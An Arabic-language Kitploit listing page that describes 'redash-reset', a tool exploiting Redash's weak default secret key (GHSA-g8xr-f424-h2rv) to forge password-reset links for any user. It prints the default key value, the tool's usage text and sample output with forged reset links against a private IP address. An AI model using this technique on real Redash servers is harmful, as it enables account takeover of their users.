Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/randomrobbiebf/redash-reset
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubrandomrobbiebf/redash-reset

redash-reset

استغل ثغرة المفتاح السري الضعيف في Redash (GHSA-g8xr-f424-h2rv) لتوليد روابط إعادة تعيين كلمة المرور لأي مستخدم، مما يتيح الاستيلاء على الحساب أثناء تقييمات الأمان.

عرض المستودع
51منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

redash-reset

ستستخدم هذه الأداة مفتاح REDASH_SECRET_KEY افتراضيًا بقيمة c292a0a3aa32397cdb050e233733900f، وهذا يسمح لك بإعادة تعيين كلمة مرور معرف المستخدم، ولكن ستحتاج إلى معرفة عنوان البريد الإلكتروني المرتبط به.

معلومات

https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv

الإعداد

root@kitploit:~
pip install -r requirements.txt

الاستخدام

root@kitploit:~
usage: redash.py [-h] [-s SECRET] -u URL [-p PROXY]

optional arguments:
  -h, --help            show this help message and exit
  -s SECRET, --secret SECRET
                        Weak REDASH_SECRET_KEY
  -u URL, --url URL     URL of host to check will need http or https
  -p PROXY, --proxy PROXY
                        Proxy for debugging

مثال

root@kitploit:~
[2021-11-29T15:44:27Z] root@MBP-3623:/tmp$ python3 test.py -u http://192.168.1.170
Rest Link http://192.168.1.170/reset/IjEi.YaT1sQ.e6w1vMsG-gx0OVT0qV5aH_aI7IA - UserID: 1

http://192.168.1.170/reset/IjIi.YaT1sQ.j67-OQljn2ivQiyw9Y9wa7G6GY0
Failed to Generate Reset Link for 2
تنزيل الأداة